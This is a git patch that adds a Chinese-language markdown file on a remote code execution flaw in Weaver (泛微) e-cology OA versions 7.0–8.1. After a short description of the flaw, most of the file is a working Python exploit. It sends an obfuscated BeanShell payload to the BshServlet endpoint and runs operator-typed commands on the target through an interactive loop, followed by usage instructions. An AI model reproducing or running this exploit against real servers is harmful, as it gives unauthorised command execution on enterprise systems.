From c3c6a8e11aa37ca64dce1332ccad8849dee233a0 Mon Sep 17 00:00:00 2001 From: mr-xn Date: Tue, 24 Sep 2019 22:37:28 +0800 Subject: [PATCH] =?UTF-8?q?=E6=B3=9B=E5=BE=AEOA=E7=AE=A1=E7=90=86=E7=B3=BB?= =?UTF-8?q?=E7=BB=9FRCE=E6=BC=8F=E6=B4=9E=E5=88=A9=E7=94=A8=E8=84=9A?= =?UTF-8?q?=E6=9C=AC.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 泛微OA管理系统RCE漏洞利用脚本.md | 54 ++++++++++++++++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 泛微OA管理系统RCE漏洞利用脚本.md diff --git a/泛微OA管理系统RCE漏洞利用脚本.md b/泛微OA管理系统RCE漏洞利用脚本.md new file mode 100644 index 0000000..7d8dffe --- /dev/null +++ b/泛微OA管理系统RCE漏洞利用脚本.md @@ -0,0 +1,54 @@ +## 前言 + +泛微e-cology OA远程代码执行|泛微OA管理系统RCE漏洞利用脚本 + +## 漏洞简介 + +泛微OA管理系统RCE漏洞:攻击者可通过精心构造的请求包攻击易受损的泛微OA用户,实现任意代码执行,进而获取系统Shell。企业用户可以使用腾讯御知检测企业网络资产是否存在该漏洞。 + +## 漏洞危害 + +攻击者可通过精心构造的请求包攻击易受损的泛微OA用户,实现任意代码执行,进而获取系统Shell + +## 影响范围 + +### 产品 + +> 泛微e-cology + +### 版本 + +> 包括不限于7.0,8.0,8.1版 + +### 组件 + +> 泛微e-cology + +## 漏洞复现 + +```python +import requests +import sys + +headers = { + 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', + 'Accept-Language': 'zh-CN,zh;q=0.9', + 'Content-Type': 'application/x-www-form-urlencoded' +} + + +def exploit(url,cmd): + target=url+'/weaver/bsh.servlet.BshServlet' + payload='bsh.script=eval%00("ex"%2b"ec(\\"cmd+/c+{}\\")");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw'.format(cmd) + res=requests.post(url=target,data=payload,headers=headers,timeout=10) + res.encoding=res.apparent_encoding + print(res.text) + +if __name__ == '__main__': + url=sys.argv[1] + while(1): + cmd=input('cmd:') + exploit(url,cmd) +``` +USAGE:python e-cology-rce.py http://target.com/ 根据提示输入需要执行的命令即可检测 \ No newline at end of file